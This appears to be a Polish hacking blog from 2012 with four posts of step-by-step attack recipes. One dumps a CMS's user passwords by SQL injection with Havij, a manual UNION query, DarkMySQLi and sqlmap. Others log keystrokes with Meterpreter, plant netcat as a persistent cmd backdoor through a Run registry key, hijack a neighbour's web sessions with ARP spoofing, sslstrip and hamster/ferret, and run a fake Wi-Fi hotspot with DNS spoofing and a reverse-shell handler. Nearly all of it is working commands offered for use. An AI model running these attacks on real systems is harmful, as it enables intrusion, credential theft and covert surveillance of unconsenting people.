poniedziałek, 9 kwietnia 2012

Advanced sql injection (5 sposobow jak przejac kontrole nad strona www)

havij | manual | mms_05.jar | DarkMySQLi | sqlmap
download podatnego systemu cms do pobrania z tad
http://www.exploit-db.com/exploits/18708/
1. havij
download
http://itsecteam.com/en/projects/project1_page2.htm
2. manual
http://192.168.1.102/GENU-2012.3/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--
3. mms_05.jar
download
http://www.scrt.ch/en/attack/downloads/mini-mysqlat0r
java -jar mms_05.jar
http://192.168.1.104/GENU-2012.3/
4. DarkMySQLi
cd /pentest/web/darkmysqli
python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" --findcol

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" --dbs

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" --full

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" -D baza -T genu_users -C user_name,user_password --dump

5. sqlmap
cd /pentest/database/sqlmap/
python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" --dbs

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza --tables

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza -T genu_users --columns

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza -T genu_users -C user_email,user_name,user_password --dump

GAME OVER

niedziela, 1 kwietnia 2012

środa, 28 marca 2012

meterpreter keyloger and upload backdoor

keyloger i netcat
Komendy:
KEYLOGER
migrate (pid explorer.exe)
keyscan_start
keyscan_dump(opcjonalnie cala siec)
keyscan_stop
UPLOAD BACKDORS nc.exe
cd /pentest/windows-binaries/tools/
cp nc.exe /root/Desktop/(opcjonalnie)
upload /root/nc.exe C:\\WINDOWS\\SYSTEM32 dla win 7 ustawiamy przywileje
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v test -d 'C:\WINDOWS\SYSTEM32\nc.exe -L -d -p 4444 -e cmd'
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(opcjonalnie sprawdzamy czy wszystko jest ok
nc ip_hosta port
GAME OVER

poniedziałek, 26 marca 2012

hamster + ferret

czyli co słychać u sąsiada ;)
Komendy:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan1 -t 192.168.1.107 192.168.1.1
arpspoof -i wlan1 192.168.1.1(opcjonalnie cala siec)
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f
cd /pentest/sniffers/hamster
./ferret -i wlan1
cd /pentest/sniffers/hamster
./hamster -i wlan1
cat /root/sslstrip.log
pamietajcie o zmianie ustawien przegladarki na proxy :D GAME OVER

niedziela, 25 marca 2012

fake ap windows 7 exploit
Komendy:
apt-get install dhcp3-server -y
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
kwrite /etc/dhcp3/dhcpd.conf

ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; subnet 192.168.2.128 netmask 255.255.255.128 { option subnet-mask 255.255.255.128; option broadcast-address 192.168.2.255; option routers 192.168.2.129; option domain-name-servers 8.8.8.8; range 192.168.2.130 192.168.2.140; }

airmon-ng start wlan1
airbase-ng -e "Hotspot" -c 9 mon0
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
/etc/init.d/apache2 start
ifconfig (opcjonalnie)
kwrite /usr/share/ettercap/etter.dns
arpspoof -i at0 192.168.2.129
ettercap -T -q -i at0 -P dns_spoof -M arp // //
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.131
set LPORT 4444
exploit
jak ktos by chcial index.php i ikonke pw na forum :D
GAME OVER